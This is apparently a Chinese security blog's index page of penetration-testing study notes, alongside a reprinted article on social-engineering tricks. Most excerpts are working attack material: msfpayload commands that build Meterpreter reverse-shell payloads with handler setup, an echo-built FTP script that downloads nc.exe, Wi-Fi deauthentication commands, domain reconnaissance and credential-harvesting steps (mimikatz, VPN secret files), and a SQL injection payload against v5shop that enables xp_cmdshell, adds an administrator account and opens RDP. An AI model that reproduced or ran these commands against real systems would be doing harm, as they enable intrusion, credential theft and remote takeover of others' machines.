学习笔记

TK教主之U盘病毒解决方法

TK教主之U盘病毒解决方法
... 继续阅读 »
学习笔记

黑客社会工程学攻击的八种常用伎俩

黑客社会工程学攻击的八种常用伎俩
黑客社会工程学攻击的八种常用伎俩2010-08-20 13:35出处:安全在线[导读]著名黑客Kevin Mitnick在上世纪90年代让"黑客社会工程学"这个术语流行了起来,不过这个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了。专家们认为,如今的黑客仍在继续采用黑客社会工程学的新老伎俩盗窃密码、安装恶意软件或者攫取利益。  著名黑客Kevin Mitnick在上世纪90年代让"黑客社会工程学"这个术语流行了起来,不过这个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了。专家们认为,如今的黑客仍在继续采用黑客社会工程学的新老伎俩盗窃密码、安装恶意软件或者攫取利益。  此处所列的是一些最流行的利用电话、email和网络的社会工程学攻击伎俩。  1. 十度分隔法  利用电话进行欺诈的一位社会工程学黑客的首要任务,就是要让他的攻击对象相信,他要么是1)一位同事,要么是2)一位可信赖的专家(比如执法人员或者审核人员)。但如果他的目标是要从员工X处获取信息的话,那么他的第一个电话或者第一封邮件并不会直接打给或发给X。  在社会心理学中,六度分隔的古老游戏是由很多分隔层的。纽约市警察局的一位老资格探员Sal Lifrieri,如今正定期举办一个叫做"防范性运营"的企业培训课程,教授如何识别黑客穿透某个组织的社会工程学攻击手段。他说,黑客在一个组织中开始接触的人可能会与他所瞄准的目标或人隔着十层之远。  "我讲课时不断地在告诫人们,多少得具备一些放人之心,因为你不知道某人到底想从你这儿获得什么,"Lifrieri说。渗透进入组织的起点" 可能是前台或门卫。所以企业必须培训员工彼此相识。而作为犯罪起点的秘书或者前台距离犯罪分子真正想接近的目标有可能隔着十层之远。"  Lifrieri说,犯罪分子所用的方法很简单,就是奉承某个组织里更多可以接近的人,以便从职务更高的人那里获得他们所需的信息。  "他们常用的技巧就是伪装友好,"Lifrieri说。"其言辞有曰:‘我很想跟您认识一下。我很想知道在您的生活中哪些东西是最有用的。'然后他们很快就会从你那里获得很多你原本根本不会透露的信息。"  2. 学会说行话  每个行业都有自己的缩写术语。而社会工程学黑客就会研究你所在行业的术语,以便能够在与你接触时卖弄这些术语,以博得好感。  "这其实就是一种环境提示,"Lifrieri说,"假如我跟你讲话,用你熟悉的话语来讲,你当然就会信任我。要是我还能用你经常在使用的缩写词汇和术语的话,那你就会更愿意向我透露更多的我想要的信息。"  3. 借用目标企业的"等待音乐"  Lifrieri说,成功的骗子需要的是时间、坚持不懈和耐心。攻击常常是缓慢而讲究方法地进行的。这不仅需要收集目标对象的各种轶事,还要收集其他的"社交线索"以建立信任感,他甚至可能会哄骗得你以为他是你还未到这家企业之前的一位同事。  另外一种成功的技巧是记录某家公司所播放的"等待音乐",也就是接电话的人尚未接通时播放的等待乐曲。  "犯罪分子会有意拨通电话,录下你的等待音乐,然后加以利用。比如当他打给某个目标对象时,他会跟你谈上一分钟然后说:‘抱歉,我的另一部电话响了,请别挂断,'这时,受害人就会听到很熟悉的公司定制的等待音乐,然后会想:‘哦。此人肯定就在本公司工作。这是我们的音乐。'这不过是又一种心理暗示而已。"  4. 电话号码欺诈  但最分子常常会利用电话号码欺诈术,也就是在目标被叫者的来电显示屏上显示一个和主叫号码不一样的号码。  "犯罪分子可能是从某个公寓给你打的电话,但是显示在你的电话上的来电号码却可能会让你觉得好像是来自同一家公司的号码,"Lifrieri说。  于是,你就有可能轻而易举地上当,把一些私人信息,比如口令等告诉对方。而且,犯罪分子还不容易被发现,因为如果你回拨过去,可能拨的是企业自己的一个号码。  5. 利用坏消息作案  "只要报纸上已刊登什么坏消息,坏分子们就会利用其来发送社会工程学式的垃圾邮件、网络钓鱼或其它类型的邮件,"McAfee Avert实验室的安全研究主任Dave Marcus说。  Marcus说,他们的实验室在这次的美国总统大选和经济危机中看到了此类活动的增多趋势。  "有大量的网络钓鱼攻击是和银行间的并购有关的,"Marcus说。"钓鱼邮件会告诉你说,‘你的存款银行已被他们的银行并购了。请你点击此处以确保能够在该银行关张之前修改你的信息。'这是诱骗你泄露自己的信息,他们便能够进入你的账户窃取钱财,或者倒卖储户的信息。"  6. 滥用网民对社交网站的信任  Facebook、MySpace和LinkedIn都是非常受欢迎的社交网站。很多人对这些网站十分信任。而最近的一次钓鱼欺诈事件就瞄上了LinkedIn的用户,这次攻击让很多人感到震惊。Marcus说,已经有越来越多的社交网站迷们收到了自称是Facebook网站的假冒邮件,结果上了当。  "用户们会收到一封邮件称:‘本站正在进行维护,请在此输入信息以便升级之用。'只要你点进去,就会被链接到钓鱼网站上去。"Marcus因此建议人恩最好手工输入网址以避免被恶意链接。并应该记住,很少有某个网站会寄发要求输入更改口令或进行账户升级的邮件。  7. 输入错误捕获法  犯罪分子还常常会利用人们在输入网址时的错误来作案,Marcus说。比如当你输入一个网址时,常常会敲错一两个字母,结果转眼间你就会被链接到其他网站上去,产生了意想不到的结果。  "坏分子们早就研究透了各种常见的拼写错误,而他们的网站地址就常常使用这些可能拼错的字母来做域名。"  8. 利用FUD操纵股市  一些产品的安全漏洞,甚至整个企业的一些漏洞都会被利用来影响股市。根据Avert的最新研究报告,例如微软产品的一些关键性漏洞就会对其股价产生影响,每一次有重要的漏洞信息被公布,微软的股价就会出现反复的波动。  "公开披露信息肯定会对股价产生影响,"Marcus说。"另有一个例子表明,还有人故意传播斯蒂夫·乔布斯的死讯,结果导致苹果的股价大跌。这是一个利用了FUD(恐慌、不确定、怀疑),从而对股价产生作用的明显事例。"  当然,反向操纵的手法也会发生,这很像以前的所谓"哄抬股价"的伎俩。垃圾邮件的发送者会购买大量的垃圾股,然后伪装成投资顾问疯狂发送邮件,兜售所谓的"潜力股"。如果有足够多的邮件接收者相信了这一骗局并购买了这种垃圾股,其股价就会被哄抬起来。而始作俑者便会迅速卖空获利。... 继续阅读 »
渗透工具

发现隐藏的SSID

发现隐藏的SSID
需要一个网卡,wlan01、airmon-ng airmon-ng start wlan0 监听启动需要等待一会儿 2、airodump-ng airodump-ng mon0 寻找隐藏的SSID,ESSID 显示<length: 0>代表这是一个隐藏的SSIDairodump-ng -c 1 mon0 指定隐藏SSID所在的频道(Channel) 过一会儿就可以看到得到了隐藏SSID的名字了不想等待:aireplay-ng发送死亡包攻击配合airodump-ng 很快就得到隐藏SSID名字aireplay-ng -O 2 -a 00:1B:11:60:17:3F mon0... 继续阅读 »
学习笔记

history的作用

history的作用
historylinux的history命令的作用是,记录执行过的命令。用法:history [n]  n为数字,列出最近的n条命令-c  将目前shell中的所有history命令消除,这样就不能用方向键上翻之前执行的命令了。history [-raw] histfiles-a 将目前新增的命令写入histfiles, 默认写入~/.bash_history   这个文件记录了执行过的历史命令-r  将histfiles内容读入到目前shell的history记忆中,读取后 history就可以看到有记录了,并且方向键也可以上下翻到命令了。-w 将目前history记忆的内容写入到histfiles ,更新记录文件 使用! 执行历史命令![n]例如 :!2 => 执行history中记录的第二条命令!cat => 执行history中记录的最近的cat开头的命令!! => 执行上一条命令 查看history记录行数echo $HISTSIZE  配置行数记录:配置文件在/etc/profile中修改HISTSIZE=1000export  HISTSIZE想要让linux的history命令显示时间,history是默认不带时间,在/etc/profile 中增加export HISTTIMEFORMAT="%y-%m-%d %H:%M:%S "修改后:history查看效果:参考:http://blog.csdn.net/yonggang7/article/details/40710623... 继续阅读 »
内网渗透

Metasploit的Meterpreter的生成

Metasploit的Meterpreter的生成
Windows Metermsfpayload windows/meterpreter/reverse_http LHOST=192.168.21.131 LPORT=10516 X > shell.exeuse exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.174.131 set LPORT 9888 exploit -jLINUX Metermsfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai >> /root/Desktop/testuse exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.174.131 set LPORT 9888 exploit... 继续阅读 »
学习笔记

内外渗透技巧

内外渗透技巧
能执行命令,但是不能直接上传文件怎么破?         window:ftp下载-wget.exe文件使用    ftp -s:d:\ftp.txt下载文件:    echo open xxx.xxx.xxx.xxx>>d:\ftp.txt    echo admin>>d:\ftp.txt    echo 123456>>d:\ftp.txt    echo get nc.exe d:\nc.exe>>d:\f.txt    echo bye >>d:\ftp.txt         Linux: wget下载 LCX转其他服务器的端口... 继续阅读 »
内网渗透

2015-7-29 内网渗透-进入内网

2015-7-29 内网渗透-进入内网
1、打通渠道,进入目标网络VPN进入目标网络各种代理:ss5的代理SSH建立SS5ssh -C -g -D 2333 root@我的IPNC 没有-e 绑定执行bash的时候怎么破?端口复用:适合场景,目标只开了80,我们要怎么搞了呢? reDuh:  提供了 jsp , asp ,php 三类复用工具EW.exe 端口转发:融合NC和Lcx的功能(rootkiter.com )下载2、内网探测Nmap  探测内网Nbtscan Nslookup -qt=txt 或 -qt=mx 或 -qt=Aarp -a3、内网嗅探caintcpdump  4、imcp后门   nice后门2、欺骗的艺术案例:信息探测+邮件服务器+溢出传说中的水坑攻击... 继续阅读 »
内网渗透

2015-7-29 内网渗透-信息收集

2015-7-29 内网渗透-信息收集
怎么发现内网?arp -a 或者 netstat -ano 或者 net view 或者 nslookup baidu.com net view 查看内网情况ifonfig /all [注意看:Primary Dns Suffix ,可能得到一个域xxxx-cc.com,ping一下得到与服务器IP]net config workstation 会显示本机计算机名和管理员用户名,工作站的域DNS名称及登录到的域net localgroup administrators - 查看本机在域里里面的角色net user /domain - 查看域里面的用户net group "domain admins" /domain 信息收集       > 操作系统信息收集           windows: Cain爆注册表,WCE , MIMIkatz,Pwdum7          Linux : /etc/passwd数据库信息收集       >各种web的配置文件中间件       各种中间件的信息浏览器信息收集      1、发现管理员浏览看过的其他内网的IP      2、发现浏览器保存的账号密码和没有过期的Cookie第三方应用       >Rsync           1、配置文件 :/etc/rsyncd.conf       >Openvpn           1、配置文件 :  /etc/ppp/chap-secrets       >ftp           1、配置文件        >SSH           1、su密码记录操作记录    >Linux           >cat .bash_history | more            >cat .mysql_history           >ls -al 寻找.vnc  .ssh等           > last 中间件的日志,系统日志 [last去看,登陆最频繁的IP,如果拿下它,可能会获得一大批服务器的账号密码。]           >SSH信任连接[寻找密钥,配置的无密码登陆文件]    >Windows         >浏览器记录         >最近访问文件敏感文档     .bat、.sh  .bt    .doc   .xls   .conf   .vnc 文件... 继续阅读 »
学习笔记

2015-7-28 提权

2015-7-28 提权
1、系统漏洞提权微软: MS08067 MS: Micosoft的缩写08: 表示年份,即 2008年发布的漏洞067: 表示顺序,即当年发布的第67个漏洞2、如何知道使用哪个EXP?使用systeminfo查看补丁目录,查看补丁记录,判断哪个补丁没打,使用对应的EXP进行提权Windows Linux系统提权 用各种EXP打3、数据库提权原理:启动数据库的账号是高权限账号,使用数据库执行系统命令相当于使用高权限账号使用系统命令,提权也属于权限继承类提权。MYSQL: UDF 提权适用场景:Windows 2000,XP,Win2003能够对数据库表INSERT 和 DELETE权限MYSQL最好默认启动权限是system (Linux默认是mysql用户)UDF 提权方法:1、获取当前MySQL的一个数据库连接信息,通常包含地址、端口、账号、密码、库名等五个信息。2、上传UDF提权用的DLL,并进行数据库连接。3、连接成功后,导出DLL文件。select * from outfile 'aaaa.dll'4、使用SQL语句创建自定义函数 5、通过SQL语句调用创建的函数6、删除函数和dll4. DLL劫持提权  每一个文件在开始运行时都要寻找各种它需要的DLL(动态链接库),来满足程序的功能和需求。但是有一个特性,就是每个EXE运行前都要寻找一个名为LPK.DLL的文件,并执行它。优先搜寻当前目录下的DLL加载,然后再到系统目录下去加载:LPK.dll5. python交互式bash... 继续阅读 »
学习笔记

v5shop四句SQL话搞定服务器权限

v5shop四句SQL话搞定服务器权限
注入点:http://192.168.16.102/weblogin/login.aspx  用户名框v5shop版本:SOMS V8.0(标准版) Powered By v5shop.com }','',''); exec master..sp_configure 'show advanced options',1; RECONFIGURE; exec master..sp_configure 'xp_cmdshell',1; --           //看去xp_cmdshell}','',''); exec master..xp_cmdshell "net user test test /add"  --       //添加用户}','',''); exec master..xp_cmdshell "net localgroup administrators test /add "  --    //将用户添加到管理员组}','',''); exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;  --                       //开启3389... 继续阅读 »